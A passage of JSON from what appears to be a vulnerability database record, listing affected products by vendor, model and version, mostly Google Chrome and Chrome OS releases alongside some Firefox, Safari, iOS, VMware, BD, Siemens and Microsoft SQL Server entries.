        "version": "19.0.1084.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.604.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.40"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.44"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.150"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.40"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.756.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.34"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.123"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.51"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.233"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.955.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.760.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.110"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.368.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.594.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.118"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.743.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.97"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96365"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.130"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "63.0.3239.86"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.816.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.393.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.362.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.618.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.628.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.815.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.423.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.802.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.12"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.17"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "_id": null,
        "model": "prepstain",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.323.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.804.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.370.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.203"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.805.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.789.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.32"
      },
      {
        "_id": null,
        "model": "totalys slideprep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.315"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.55"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.512.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.109"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.5"
      },
      {
        "_id": null,
        "model": "simatic ipc427e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.901.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.729.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.23"
      },
      {
        "_id": null,
        "model": "chrome os beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.130.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.102"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.483.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.467.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.200"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.10"
      },
      {
        "_id": null,
        "model": "facslink interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.25"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.111"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1017"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.748.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.727.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.379.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.654.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.32"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.119"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.334.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.303"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.91"
      },
      {
        "_id": null,
        "model": "facsjazz",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.90"
      },
      {
        "_id": null,
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1030"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.132"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.51"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.336"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.602.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.211"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.104"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.79"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.931.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.115"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.722.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.32"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.520.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
